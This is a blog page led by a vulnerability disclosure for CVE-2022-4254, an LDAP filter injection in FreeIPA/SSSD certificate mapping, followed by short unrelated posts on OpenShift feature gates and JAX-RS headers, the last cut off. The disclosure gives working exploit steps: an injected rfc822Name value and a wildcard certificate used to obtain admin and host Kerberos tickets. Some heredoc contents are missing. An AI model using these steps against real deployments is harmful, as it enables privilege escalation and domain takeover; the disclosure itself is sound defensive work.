Fraser's IdM Blog

CVE-2022-4254: FreeIPA PKINIT certificate mapping vulnerability

2023-02-02T00:00:00Z


Executive summary §

FreeIPA supports the Kerberos PKINIT protocol extension (RFC 4556). PKINIT enables a client to authenticate to the KDC using an X.509 certificate and the corresponding private key, rather than a passphrase or keytab. FreeIPA uses mapping rules to map a certificate presented during a PKINIT authentication request to the corresponding principal. The mapping filter is vulnerable to LDAP filter injection. The search result can be influenced by values in the certificate, which may be attacker controlled. In the most extreme case, an attacker could gain control of the admin account, leading to full domain takeover.

FreeIPA is not vulnerable in its default configuration. Exploiting this bug requires that:

PKINIT is used in the environment, with certmap rules that are susceptible to LDAP filter injection via data from the client’s certificate; and
A client certificate used for PKINIT includes data that result in the construction of an LDAP filter with a different meaning than the administrator intended. This is unlikely in general, but some use cases present a heightened risk, especially if the CA includes (or can be induced to include) client-supplied or attacker-controlled attributes in end-entity certificates.

The issue was assigned CVE-2022-4254.

Affected versions §

The problem is in libsss_certmap, which is part of SSSD. FreeIPA servers use this library in the ipa_kdb Kerberos plugin implementation.

The issue was introduced in SSSD 1.15.3 (when libsss_certmap was introduced) and resolved in SSSD 2.3.1.

All supported versions of RHEL 7 were affected (the fix was released on the RHEL 7.9 bugfix stream). RHEL 8.0 up to 8.3 (inclusive) were also affected (the fix was released to the still-supported streams).

RHEL 8.4 onwards and RHEL 9 are not affected. No supported versions of Fedora are affected.

Timeline §

2017-07-25: libsss_certmap was released with SSSD 1.15.3.
2020-04-28: SSSD issue pagure#4180 / github#5135 was created, reporting a lack of sanitisation of filter substitutions in maprules.
2020-07-24: The sanitisation issue was fixed upstream and SSSD 2.3.1 was released, containing the fix.
2022-11-16: While reviewing a feature involving the use of PKINIT, I noticed that some versions of the libsss_certmap code did not seem to sanitise certificate data used in LDAP filters. I started to investigate.
2022-11-17: I succeeded in exploiting the behaviour, and began internal discussions with Red Hat’s Platform Security engineering team.
2022-12-01: I sent my analysis to Red Hat’s Product Security team. CVE-2022-4254 was reserved for this issue on the same day.
2023-01-24: Planned release of fix to RHEL 7.9 sssd package, in Batch Update 20. Details of the vulnerability were made public.

Problem description §

FreeIPA supports certificate mapping rules for mapping certificates presented during PKINIT authentication to a Kerberos principal. Certmap rules are stored in the LDAP database under cn=certmaprules,cn=certmap,{basedn}. The ipa_kdb plugin uses libsss_certmap to process certmap rules. An example rule object:

dn: cn=certmap1,cn=certmaprules,cn=certmap,dc=ipa,dc=test
cn: certmap1
ipacertmapmaprule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
ipaenabledflag: TRUE
objectClass: ipacertmaprule
objectClass: top

The ipacertmapmaprule attribute is a string representation of an LDAP filter (RFC 4515), with substitution templates in curly braces (e.g. {subject_dn}). Template substitution is performed by the sss_certmap_get_search_filter subroutine. The supported templates are described in sss_certmap(5). They include:

{cert!base64} (base64 encoding of whole certificate)
{issuer_dn}
{subject_dn}
{subject_rfc822_name}
{subject_dns_name}

The KDC uses the resulting filter within a bigger search filter that it uses to match the principal. The filter includes the requested principal name from the Kerberos authentication service request (AS_REQ), and the maprule filter. The complete filter has the following structure (wrapped for readability):

(&
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=REQUESTED_PRINCIPAL@REQUESTED_REALM)
    (krbPrincipalName:caseIgnoreIA5Match:=REQUESTED_PRINCIPAL@REQUESTED_REALM)
  )
  MAPRULE_FILTER_GOES_HERE
)

Note that the requested principal is specified by the client in the Kerberos AS_REQ. This value is properly escaped where it is inserted in the filter. But it is important to note that the client can specify any principal the maprule filter fragment matches.

Sanitisation not performed §

Some template substitutions are inherently safe, but some use values from the certificate that could contain characters with special meaning in LDAP filters. Of the substitutions listed above, only {cert!base64} is safe. The others could contain special characters (and there are still more that I did not list). Values that could contain special characters have to be sanitised (escaped). Specifically, the following characters must be replaced with a hex escape sequence:

NUL → \00
( → \28
) → \29
* → \2A
\ → \5C

The affected versions of SSSD do not perform this sanitisation. As a consequence, the template substitutions can result in invalid filters (resulting in authentication failure) or filters that match the wrong principal entry (dangerous). The next two sections demonstrate two different exploit scenarios.
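
The escaping described above can be sketched in a few lines of Python. This is only an illustration of the RFC 4515 rule, not the SSSD implementation (which is written in C); the function name escape_filter_value is an assumption made for this example.

```python
# Illustrative sketch only: escape_filter_value is a hypothetical helper,
# not part of SSSD or FreeIPA.

# Characters with special meaning in LDAP filters and their hex escapes.
ESCAPES = {
    "\x00": r"\00",
    "(": r"\28",
    ")": r"\29",
    "*": r"\2A",
    "\\": r"\5C",
}


def escape_filter_value(value: str) -> str:
    """Escape a string for use as an assertion value in an LDAP filter.

    Each character is examined exactly once, so the backslashes
    introduced by an escape sequence are never escaped again.
    """
    return "".join(ESCAPES.get(ch, ch) for ch in value)


if __name__ == "__main__":
    # The rfc822Name and dNSName values used in the two demos.
    print(escape_filter_value('"bogus)(uid=admin)(cn="@ipa.test'))
    print(escape_filter_value("*.ipa.test"))
```

Escaping character by character, rather than chaining string replacements, avoids having to order the replacements so that the backslash is handled first.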

LDAP filter injection has been assigned CWE-90 in the Common Weakness Enumeration database. Conceptually it is very similar to SQL injection (CWE-89).

Demo 1: Attacker-supplied rfc822Name §

We will issue a certificate with an attacker-supplied rfc822Name SAN value to an unprivileged user. The deployment has a plausible certmap rule with a structure that can be exploited to obtain a TGT for an attacker-specified user account, including highly privileged accounts such as admin.

It is a fresh deployment running FreeIPA 4.6 on RHEL 7.9:

# cat /etc/redhat-release
Red Hat Enterprise Linux Server release 7.9 (Maipo)

# rpm -qa |grep ipa-
ipa-client-4.6.8-5.el7.x86_64
sssd-ipa-1.16.5-10.el7.x86_64
ipa-server-4.6.8-5.el7.x86_64
ipa-common-4.6.8-5.el7.noarch
ipa-client-common-4.6.8-5.el7.noarch
ipa-server-common-4.6.8-5.el7.noarch

Setup §

Setup steps establish the user account, certmap rules, certificate profiles and issuance policies required for the subsequent attack. I perform these steps using the admin account:

# klist
Ticket cache: KEYRING:persistent:0:0
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:00:19  29/11/22 23:00:07  ldap/rhel78-0.ipa.test@IPA.TEST
28/11/22 23:00:09  29/11/22 23:00:07  krbtgt/IPA.TEST@IPA.TEST

Create the unprivileged user alice. She will be the subject principal to whom the certificate will be issued.

# ipa user-add alice --first Alice --last Able --password
Password: XXXXXXXX
Enter Password again to verify: XXXXXXXX
------------------
Added user "alice"
------------------
...

Add a new mail attribute to alice’s LDAP entry. This will enable us to issue a certificate from the internal CA that includes the value as an rfc822Name Subject Alternative Name value.

# echo > mod.ldif <


I had to add the new mail attribute via ldapmodify because the
email validation performed by the IPA API does not admit all valid
local-part values. But it is in fact a valid email address.

The default access controls in FreeIPA do not allow non-admins to
modify mail attributes, even in their own entry. But I use this
approach because it is plausible for an organisation to have a
system that allows employees to request a specific mail alias.
Indeed we have such a system at Red Hat, although I don’t know if it
would allow such an exotic value.

Next, add a CA ACL rule that permits certificates to be issued to
user principals. For convenience we will use the included
caIPAserviceCert profile. Typical real world user certificate
scenarios would require a dedicated profile.
# ipa caacl-add users_caIPAserviceCert --usercat=all
-------------------------------------
Added CA ACL "users_caIPAserviceCert"
-------------------------------------
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all

# ipa caacl-add-profile users_caIPAserviceCert --certprofile caIPAserviceCert
  ACL name: users_caIPAserviceCert
  Enabled: TRUE
  User category: all
  Profiles: caIPAserviceCert
-------------------------
Number of members added 1
-------------------------
Finally add the certmap rule. It has a two-part or-list intended
to match the rfc822Name from the certificate to the mail
attribute, or else match the certificate subject DN to DN of the
LDAP entry:
# ipa certmaprule-add certmap1 --maprule \
    "(|(mail={subject_rfc822_name})(entryDN={subject_dn}))"
--------------------------------------------------
Added Certificate Identity Mapping Rule "certmap1"
--------------------------------------------------
  Rule name: certmap1
  Mapping rule: (|(mail={subject_rfc822_name})(entryDN={subject_dn}))
  Enabled: TRUE

The steps performed above are not part of the exploit itself, and
they require administrator privileges to perform. They are
presented as plausible configurations, the likes of which may
exist (or not) in a customer’s environment.

Exploit §
alice will request a certificate with the suspicious rfc822Name
and acquire a TGT for the admin user. First obtain a TGT for
alice (using password authentication):
$ kinit alice
Password for alice@IPA.TEST:
Create a new keypair and certificate signing request (CSR). The
config causes the CSR to bear a SAN extension request containing
the malicious rfc822Name:
$ echo > naughty.conf <

Issue the certificate (this is a self-service certificate request,
which FreeIPA allows, subject to CA ACLs):
$ ipa cert-request naughty.csr \
    --principal alice \
    --certificate-out naughty.pem
  Issuing CA: ipa
  Certificate: MIIEPjCC...
  Subject: CN=alice,O=IPA.TEST 202211171708
  Subject email address: "bogus)(uid=admin)(cn="@ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 04:42:58 2022 UTC
  Not After: Fri Nov 29 04:42:58 2024 UTC
  Serial number: 13
  Serial number (hex): 0xD
Finally, use the new certificate and key to obtain a TGT for
admin:
$ kinit -X X509_user_identity=FILE:naughty.pem,naughty.key admin

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: admin@IPA.TEST

Valid starting     Expires            Service principal
28/11/22 23:47:44  29/11/22 23:47:44  krbtgt/IPA.TEST@IPA.TEST
The exploit succeeds because the unescaped rfc822Name value
results in a filter that matches the admin user (formatted for
readability):
(&
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=admin@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=admin@IPA.TEST)
  )
  (|
    (mail="bogus)
    (uid=admin)
    (cn="@ipa.test)
    (entrydn=CN=alice,O=IPA.TEST 202211171708)
  )
)
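The substitution step can be reproduced with a short Python sketch. It is not the libsss_certmap code; the render function and the ESCAPES table are assumptions made for illustration, while the maprule and certificate values are the ones from this demo.

```python
import re

# Maprule and certificate values taken from the demo above.
MAPRULE = "(|(mail={subject_rfc822_name})(entryDN={subject_dn}))"
CERT_VALUES = {
    "subject_rfc822_name": '"bogus)(uid=admin)(cn="@ipa.test',
    "subject_dn": "CN=alice,O=IPA.TEST 202211171708",
}

# Characters that must be hex-escaped in LDAP filter values (RFC 4515).
ESCAPES = {"\\": r"\5C", "*": r"\2A", "(": r"\28", ")": r"\29", "\x00": r"\00"}


def render(maprule: str, cert_values: dict, sanitise: bool) -> str:
    """Substitute {template} placeholders in a single pass (hypothetical helper)."""

    def substitute(match: re.Match) -> str:
        value = cert_values[match.group(1)]
        if sanitise:
            value = "".join(ESCAPES.get(ch, ch) for ch in value)
        return value

    return re.sub(r"\{([A-Za-z0-9_!]+)\}", substitute, maprule)


if __name__ == "__main__":
    # Without sanitisation the or-list gains an extra (uid=admin) clause.
    print(render(MAPRULE, CERT_VALUES, sanitise=False))
    # With sanitisation the value stays inside the (mail=...) clause.
    print(render(MAPRULE, CERT_VALUES, sanitise=True))
```

With sanitisation enabled, the parentheses in the rfc822Name become \28 and \29, so the or-list keeps its original two clauses and can only match an entry whose mail attribute literally contains the odd-looking address.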
Demo 2: Wildcard DNS name §
A wildcard certificate can be used to obtain a TGT for a different
host principal.
Setup §
Add a profile for issuing wildcard certificates. I will skip the
details and instead refer to my blog post on this topic.
Add a host called ipa.test, a host group called webservers,
and make ipa.test a member of webservers:
# ipa host-add ipa.test --force
----------------------
Added host "ipa.test"
----------------------
  Host name: ipa.test
  Principal name: host/ipa.test@IPA.TEST
  Principal alias: host/ipa.test@IPA.TEST
  Password: False
  Keytab: False
  Managed by: ipa.test

# ipa hostgroup-add webservers
----------------------------
Added hostgroup "webservers"
----------------------------
  Host-group: webservers

# ipa hostgroup-add-member webservers --hosts ipa.test
  Host-group: webservers
  Member hosts: ipa.test
-------------------------
Number of members added 1
-------------------------
Add a CA ACL that allows webservers to be issued certificates
via the wildcard profile:
# ipa caacl-add webservers_wildcard
----------------------------------
Added CA ACL "webservers_wildcard"
----------------------------------
  ACL name: webservers_wildcard
  Enabled: TRUE

# ipa caacl-add-host webservers_wildcard --hostgroup webservers
  ACL name: webservers_wildcard
  Enabled: TRUE
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------

# ipa caacl-add-profile webservers_wildcard --certprofile wildcard
  ACL name: webservers_wildcard
  Enabled: TRUE
  Profiles: wildcard
  Host Groups: webservers
-------------------------
Number of members added 1
-------------------------
Finally, add a certmap rule that uses SAN dNSName values to locate
the principal:
# ipa certmaprule-add certmap2 \
    --maprule "(fqdn={subject_dns_name})"
--------------------------------------------------
Added Certificate Identity Mapping Rule "certmap2"
--------------------------------------------------
  Rule name: certmap2
  Mapping rule: (fqdn={subject_dns_name})
  Enabled: TRUE
Exploit §
We will issue a wildcard certificate for ipa.test, and use it to
obtain a TGT for a different host. You could use Certmonger to
request the certificate, but I will interact directly with FreeIPA
via the ipa client program. The operator is the host/ipa.test
principal (I kinited using the host keytab):
$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 03:52:59  30/11/22 03:52:59  krbtgt/IPA.TEST@IPA.TEST
Create a keypair and CSR:
$ openssl req -new -subj '/CN=ipa.test/' -nodes \
    -keyout server.key -out server.csr
Generating a 2048 bit RSA private key
........................................................+++
.....................................................................................................................+++
writing new private key to 'server.key'
-----
Request the certificate, being sure to specify the wildcard
profile:
$ ipa cert-request server.csr \
    --principal host/ipa.test \
    --profile-id wildcard \
    --certificate-out server.pem
  Issuing CA: ipa
  Certificate: MIIENTCC...
  Subject: CN=ipa.test,O=IPA.TEST 202211171708
  Subject DNS name: ipa.test, *.ipa.test
  Issuer: CN=Certificate Authority,O=IPA.TEST 202211171708
  Not Before: Tue Nov 29 09:14:09 2022 UTC
  Not After: Fri Nov 29 09:14:09 2024 UTC
  Serial number: 16
  Serial number (hex): 0x10
Finally, use the new certificate and key to obtain a TGT for a
different host whose fqdn attribute matches the LDAP
substring filter (fqdn=*.ipa.test). In this example I acquire the
TGT for host/rhel78-0.ipa.test (one of the FreeIPA servers).
$ kinit -X X509_user_identity=FILE:server.pem,server.key \
    host/rhel78-0.ipa.test

$ klist
Ticket cache: KEYRING:persistent:1001:krb_ccache_UnnYkF2
Default principal: host/rhel78-0.ipa.test@IPA.TEST

Valid starting     Expires            Service principal
29/11/22 04:15:52  30/11/22 04:15:52  krbtgt/IPA.TEST@IPA.TEST
The exploit succeeds because the unescaped wildcard dNSName value
results in a substring match filter (formatted for
readability):
(&
  (|
    (objectClass=krbprincipalaux)
    (objectClass=krbprincipal)
    (objectClass=ipakrbprincipal)
  )
  (|
    (ipaKrbPrincipalAlias=host/rhel78-0.ipa.test@IPA.TEST)
    (krbPrincipalName:caseIgnoreIA5Match:=host/rhel78-0.ipa.test@IPA.TEST)
  )
  (fqdn=*.ipa.test)
)
The maprule filter matches any principal whose fqdn attribute ends
in .ipa.test. This sub-filter could match multiple principal
entries, but the client-specified principal name used in the
krbPrincipalName and ipaKrbPrincipalAlias filters selects the one
we want.
If there are multiple SAN values of the relevant type, the order is
important. The last value is used in the template substitution.
In my certificate, the last value is *.ipa.test so the exploit
succeeds. If the order was reversed, the exploit would not succeed.
This is an implementation detail of SSSD; it might as well have used
the first value but it just happened to be implemented this way.
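To see why the unescaped asterisk matters, the following Python sketch emulates how the value part of a simple (attr=value) filter is interpreted. It is a simplified model written for this post, not how the directory server evaluates filters: the matches helper is hypothetical, and real matching also depends on the attribute's matching rules (for example case sensitivity), which are ignored here.

```python
import re


def filter_value_to_regex(assertion: str) -> re.Pattern:
    """Translate the value part of a simple LDAP filter into a regex.

    An unescaped '*' stands for any substring; a backslash followed by
    two hex digits stands for one literal character.
    """
    parts = []
    i = 0
    while i < len(assertion):
        ch = assertion[i]
        if ch == "*":
            parts.append(".*")
            i += 1
        elif ch == "\\":
            literal = chr(int(assertion[i + 1:i + 3], 16))
            parts.append(re.escape(literal))
            i += 3
        else:
            parts.append(re.escape(ch))
            i += 1
    return re.compile("".join(parts), re.DOTALL)


def matches(assertion: str, attribute_value: str) -> bool:
    """Return True if the attribute value satisfies the assertion."""
    return filter_value_to_regex(assertion).fullmatch(attribute_value) is not None


if __name__ == "__main__":
    # Unescaped wildcard: a substring filter that matches other hosts.
    print(matches("*.ipa.test", "rhel78-0.ipa.test"))
    # Escaped wildcard: only the literal string "*.ipa.test" matches.
    print(matches(r"\2A.ipa.test", "rhel78-0.ipa.test"))
```

In this model the escaped form can only match an entry whose fqdn is literally "*.ipa.test", which is the behaviour the fixed versions of SSSD are expected to produce.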
Discussion §
These exploits required a confluence of contributing factors to
succeed. Deployments using PKINIT with exact certificate matching
(the default) are unaffected. The vulnerability only arises
when the customer uses certmap rules. None are defined by default.
Certmap rules (if they exist) are only potentially vulnerable;
several other factors have to come together.
The attacker must obtain a valid certificate from a trusted CA for a
key they control. Except in limited cases (e.g. wildcard DNS names)
the attacker must be able to influence the attributes on the
certificate. Only free-form string attributes are potentially
problematic. These include DNS name, email address, SAN DN values,
principal names, and perhaps others. And there have to be SSSD
certmap rule template substitutions for the targeted attribute(s).
Next, there has to be a certmap rule that substitutes the
problematic value into the LDAP search filter. All filters that
substitute free-form attributes are susceptible to exploitation.
But in practice, or-list filters are more susceptible to
exploitation than and-list or single-clause filters. This is
because the attacker has more flexibility in how to make the filter
match the target account. But as we saw in the wildcard dNSName
example, even a single-clause filter fragment could be exploitable.

The default ACIs allow any authenticated account to read certmap
rule entries. This may aid attackers in working out the attack
details.

Note that most free-form attributes have additional syntax rules
imposed upon them. For example, a SAN dNSName value should look
like a DNS name, and a SAN rfc822Name value should be a valid
email address. But the raw ASN.1 data does not guarantee this.
Even legal values can be problematic (as demonstrated). But if a
trusted CA can be induced to issue certificates that contain
arbitrary data in those free-form attributes, there is an even
greater risk of exploitation.
The use of the internal CA in this attack is incidental. The
administrator can configure FreeIPA to trust external CAs for
validating client PKINIT certificates. Any trusted CA can be used
in the attack, if the attacker can cause it to issue certificates
containing problematic values. Note that the KDC trusts the whole
system trust store, not just the trusted CAs from the FreeIPA CA
trust store. Certmap rules can be equipped with matching rules to
restrict which issuers are allowed for PKINIT certificate matching,
separate from CA trust for certification path verification purposes.
Mitigations §
Use exact certificate matching / do not use certmap rules §
PKINIT uses exact certificate matching by default. If feasible, you
can rely on that method and disable or delete any certmap rules.
ipa certmaprule-find lists all certmap rules that have been
defined. Use ipa certmaprule-disable NAME or ipa certmaprule-del NAME to disable or delete certmap rules, respectively.
The main drawback to this approach is that each principal’s entry
must have an up-to-date userCertificate attribute containing the
user’s certificate(s). This increases the size of entries, and may
have additional administrative overhead depending on how certificates
are issued and managed.
Audit and de-risk certmap rules §
Non-sanitised parameter substitution in an LDAP filter or-list is
riskier than in and-lists or single-clause filters. Replace certmap
rules containing or-lists with multiple, separate certmap rules.
Ensure each rule is as specific as possible, and consider the
possibility of outlier or malicious values in the certificate when
designing certmap rules.
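As an aid to auditing, the top-level clauses of an or-list maprule can be pulled apart mechanically. The following Python sketch assumes the maprule is a well-formed filter string; split_or_list is a hypothetical helper, not part of FreeIPA or SSSD.

```python
def split_or_list(maprule: str) -> list[str]:
    """Split '(|(a)(b))' into ['(a)', '(b)'].

    A maprule that is not a top-level or-list is returned unchanged as
    a single-element list.
    """
    if not (maprule.startswith("(|") and maprule.endswith(")")):
        return [maprule]
    body = maprule[2:-1]
    clauses = []
    depth = 0
    start = 0
    for i, ch in enumerate(body):
        if ch == "(":
            if depth == 0:
                start = i
            depth += 1
        elif ch == ")":
            depth -= 1
            if depth == 0:
                # A complete top-level clause has just been closed.
                clauses.append(body[start:i + 1])
    return clauses


if __name__ == "__main__":
    rule = "(|(mail={subject_rfc822_name})(entryDN={subject_dn}))"
    for clause in split_or_list(rule):
        print(clause)
```

Each resulting clause could then be defined as its own rule with ipa certmaprule-add, after checking that every clause is as specific as it can be.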
Review CA trust, profiles and validation §
Review the kinds of data, especially user-supplied or user-writeable
data, that can be included on certificates issued by CAs that are
trusted for PKINIT purposes. Audit how those data are validated.
Review and limit which CAs are trusted for PKINIT to only those that
are necessary. If possible, consider using dedicated CAs for
issuing the client certificates used for PKINIT. Use the certmap
matching rule feature (not discussed here) to restrict the KDC to
only allow certificates issued by the PKINIT CAs.
Fix §
Lack of sanitisation in certmap LDAP filter construction was
recognised as a bug in SSSD issue pagure#4180 / github#5135.
The framing of the issue was that legitimate values in the
certificate were causing SSSD to construct invalid LDAP filters. It
appears that the security implications were not recognised or
discussed at that time.
SSSD commit a2b9a84460429181f2a4fa7e2bb5ab49fd561274
implemented the required sanitisation. SSSD 2.3.1 was the first
release containing the fix. Commit
918fb32af6a271230bf87db47f78768edb9ca86c on
2022-01-06 backported the fix to the sssd-1.16 branch, but
there has not yet been a new release from this branch containing the
fix.
The SSSD team backported the fix to RHEL 7.9. It was included in
Batch Update 20 which was released on 2023-01-24. Fixes to
extended support streams for RHEL 8.1 and 8.2 were also released on
that day, meaning that the issue is now fixed in all supported
versions of RHEL.



Enabling Kubernetes feature gates in OpenShift
2023-01-22T00:00:00Z
When Kubernetes adds a feature or changes an existing one, the new
behaviour usually starts out hidden behind a feature
gate. Enhancements start off in the Alpha
stability class, where they are usually guarded by a feature gate
that is off by default. If the enhancement proves stable and
useful, after a few releases it will be promoted to Beta, and the
feature gate will typically default to on, though it can still
be disabled. The final stage of an enhancement is GA (generally
available). If an enhancement reaches this stage, its feature gate
becomes non-operational and is deprecated, to be removed in a
later release.
So, in a real world deployment how do you enable or disable a
feature gate? There are several “distributions” of Kubernetes and
various ways of doing it. In this short post I’ll demonstrate how
to enable feature gates in OpenShift, Red Hat’s container
orchestration platform which is built on Kubernetes.
The FeatureGate resource §
OpenShift recognises a FeatureGate resource type. A single
resource of this type named cluster determines the feature gates
used across the cluster. A cluster administrator can modify
FeatureGate/cluster to vary the feature gates set in the cluster
from the defaults.
The FeatureGate resource is more than a mere list of feature gates
to enable or disable. First, in addition to Kubernetes feature
gates, it can also set feature gates for features in OpenShift
itself, or other components or products in the cluster. Second, it
can refer to named feature sets—groups of feature gates—as an
alternative to explicitly listing all the feature gates to enable or
disable.
For example, the TechPreviewNoUpgrade feature set enables a
collection of features that Red Hat have marked as useful and worthy
of customer testing, with a view to possible promotion to full
support in a future release. Customers do not need to enable
individual feature gates but can instead enable all the Technology
Preview features via the following FeatureGate spec:
apiVersion: config.openshift.io/v1
kind: FeatureGate
metadata:
  name: cluster
spec:
  featureSet: TechPreviewNoUpgrade

Unlike the more general MachineConfig objects, FeatureGate
objects do not get composed together. Only the single object named
cluster is recognised. So there is no “lightweight” way to enable
all the feature gates from TechPreviewNoUpgrade plus one or two
additional feature gates. To accomplish that, use a
CustomNoUpgrade with all the desired feature gates listed.

Enabling specific feature gates §
What if the TechPreviewNoUpgrade feature set does not include the
feature gate you want to enable? The CustomNoUpgrade feature set
allows you to list the specific feature gates you want to enable or
disable. The following example enables the
UserNamespacesStatelessPodsSupport feature gate:
apiVersion: config.openshift.io/v1
kind: FeatureGate
metadata:
  name: cluster
spec:
  featureSet: CustomNoUpgrade
  customNoUpgrade:
    enabled:
    - UserNamespacesStatelessPodsSupport
Applying FeatureGate changes §
When you change FeatureGate/cluster, new MachineConfig objects
get generated containing updated configurations of the relevant
Kubernetes and OpenShift components (e.g. kubelet). Machine
Config Operator will progressively update and restart the nodes in
the cluster, while ensuring availability.
Let’s see an example. First, observe that all MachineConfigPools
are up to date (ready count = machine count):
% oc get MachineConfigPool -o json | jq --compact-output \
    '.items[] | { name: .metadata.name
                , count: .status.machineCount
                , ready: .status.readyMachineCount}'
{"name":"master","count":3,"ready":3}
{"name":"worker","count":3,"ready":3}
Also observe that the FeatureGate/cluster object does exist, but
its spec is empty (so the default feature gate settings are used):
% oc get -o json FeatureGate/cluster | jq .spec
{}
Now update the FeatureGate/cluster object. Assume the
CustomNoUpgrade configuration shown earlier resides in a file
named featuregate-userns.yaml.
% oc replace -f featuregate-userns.yaml
featuregate.config.openshift.io/cluster replaced
After a few moments, Machine Config Operator will observe the new
configuration and start updating and restarting the nodes.
Initially, all pools have zero machines in state ready (because
they all need updating):
% oc get MachineConfigPool -o json | jq --compact-output \
    '.items[] | { name: .metadata.name
                , count: .status.machineCount
                , ready: .status.readyMachineCount}'
{"name":"master","count":3,"ready":0}
{"name":"worker","count":3,"ready":0}
After some period of time (which will vary by cluster size), all the
nodes will have received the updated configuration and restarted.
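The readiness check performed by eye above can also be scripted. The following Python sketch assumes the JSON structure implied by the jq expression (.items[], .metadata.name, .status.machineCount, .status.readyMachineCount); the function name pools_not_ready and the sample data are made up for illustration.

```python
import json


def pools_not_ready(pool_list: dict) -> list[str]:
    """Return the names of pools whose ready count is below the machine count."""
    pending = []
    for pool in pool_list.get("items", []):
        status = pool.get("status", {})
        if status.get("readyMachineCount", 0) < status.get("machineCount", 0):
            pending.append(pool["metadata"]["name"])
    return pending


# Sample data shaped like the output of `oc get MachineConfigPool -o json`,
# reduced to the fields used here (an assumption for this sketch).
SAMPLE = json.loads("""
{"items": [
  {"metadata": {"name": "master"},
   "status": {"machineCount": 3, "readyMachineCount": 0}},
  {"metadata": {"name": "worker"},
   "status": {"machineCount": 3, "readyMachineCount": 3}}
]}
""")

if __name__ == "__main__":
    print(pools_not_ready(SAMPLE))
```

An empty list means every pool reports as many ready machines as it has machines, which is the condition observed before the FeatureGate change was applied.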
As for verifying that the updates were applied correctly, that will
depend on which gates are being enabled or disabled. It is out of
scope for this article. But in terms of how to set feature flags
in OpenShift, I hope that this article has conveyed it clearly and
that it will be useful to others.
For further detail, see the official OpenShift FeatureGate
documentation and FeatureGate object
schema.


Controlling header formatting in JAX-RS applications
2022-08-29T00:00:00Z
I’ve been implementing an Enrollment over Secure Transport
(EST) service in Dogtag PKI. During testing, I found
that a notable client implementation parses the response
Content-Type header in the following way:
if (!strncmp(
    multipart_get_data_content_type(parser),
    "application/pkcs7-mime; smime-type=certs-only",
    45)
  ) {
    ...
The Dogtag EST service is a Jakarta RESTful Web Services
(JAX-RS) application. It produces a Content-Type header
value different from what the client expects (note the lack of
whitespace):
application/pkcs7-mime;smime-type=certs-only
As a consequence, the EST client fails to process the response.
This is certainly a defect in the EST client implementation. But
EST is used by many embedded or hard-to-update network devices, and
updates might not be available (now, or ever).
So, I needed to find a way to override the default header
formatting. This blog post describes my solution.
Specifying the Content-Type header §
The JAX-RS @Produces annotation specifies the Content-Type
header value for a particular resource:
@POST
@Path("simpleenroll")
@Consumes("application/pkcs10")
@Produces("application/pkcs7-mime; smime-type=certs-only")
public Response simpleenroll(byte[] data) {
    ...
Note that the string value is not used verbatim. Instead, it is
parsed into a MediaType value and stored as such in
the response headers (a MultivaluedMap<String, Object>).
When serialising the Response, header values are stringified via
types that implement the
RuntimeDelegate.HeaderDelegate<T> interface,
where T is the real type of the header value Object. To
serialise a MediaType header value, the JAX-RS machinery uses an
instance of a class that implements
RuntimeDelegate.HeaderDelegate<MediaType>.
HeaderDelegate implementations are not part of the JAX-RS API.
They are provided by the JAX-RS implementation. In Dogtag PKI,
that’s RESTEasy. The class in question is:
public class MediaTypeHeaderDelegate
  implements RuntimeDelegate.HeaderDelegate<MediaType> {
The toString(MediaType type) method provided by this class prints
the value without a space character between the subtype and the
parameters. For the example resource above, it produces the string:
application/pkcs7-mime;smime-type=certs-only
This is a legal production in the HTTP grammar, according to RFC
7230 and RFC 7231:
media-type = type "/" subtype *( OWS ";" OWS parameter )
OWS = *( SP / HTAB )
However, we already saw that at least one EST client is unable to
process this value, because it expects a space character before the
parameters:
application/pkcs7-mime; smime-type=certs-only
This is also a legal production. But the client is using strncmp
to look for this exact string, instead of properly parsing the
value. If we can’t fix the client behaviour, we have to find a
workaround on the server to produce the exact string the client
expects.
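The difference between the two approaches can be illustrated outside of Java. The Python sketch below contrasts a fixed-prefix comparison (the equivalent of the client's strncmp call) with a comparison of parsed values. The parse_media_type helper is a simplified assumption for this example: it tolerates optional whitespace around the semicolon but does not handle quoted parameter values that themselves contain semicolons.

```python
def parse_media_type(value: str) -> tuple:
    """Parse 'type/subtype *( OWS ";" OWS parameter )' into comparable parts."""
    essence, *raw_params = value.split(";")
    mtype, _, subtype = essence.strip(" \t").partition("/")
    params = {}
    for raw in raw_params:
        raw = raw.strip(" \t")
        if not raw:
            continue  # tolerate a stray trailing ';'
        name, _, val = raw.partition("=")
        params[name.lower()] = val.strip('"')
    return mtype.lower(), subtype.lower(), params


EXPECTED = "application/pkcs7-mime; smime-type=certs-only"
PRODUCED = "application/pkcs7-mime;smime-type=certs-only"

if __name__ == "__main__":
    # Equivalent of strncmp(..., 45): compares raw characters only.
    print(PRODUCED[:45] == EXPECTED[:45])
    # Comparing parsed values ignores the optional whitespace.
    print(parse_media_type(PRODUCED) == parse_media_type(EXPECTED))
```

The parsed comparison treats both serialisations as the same media type, which is also why MediaType equality in JAX-RS does not depend on the string representation.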
Idea 1: custom HeaderDelegate §
My first idea was to override the HeaderDelegate<MediaType> with
our own implementation. I couldn’t find a general way to do that
via the JAX-RS API. It does seem that you can do it using RESTEasy
classes directly:

Implement the custom HeaderDelegate<MediaType>. To avoid
unnecessary work you could extend RESTEasy’s
MediaTypeHeaderDelegate and override just the
toString(MediaType) method.
Obtain ResteasyProviderFactory.getInstance(). Invoke
.addHeaderDelegate(MediaType.class, customInst) to replace the
HeaderDelegate.

This approach has several disadvantages:

Directly coupled to the RESTEasy implementation. May break if
RESTEasy implementation details change and will not work with
other JAX-RS implementations.
Need to implement a custom HeaderDelegate<MediaType> with
“correct” serialisation behaviour.
The “correct” serialisation behaviour might break other clients
with different bugs/quirks.

For these reasons I rejected the first idea and sought an approach
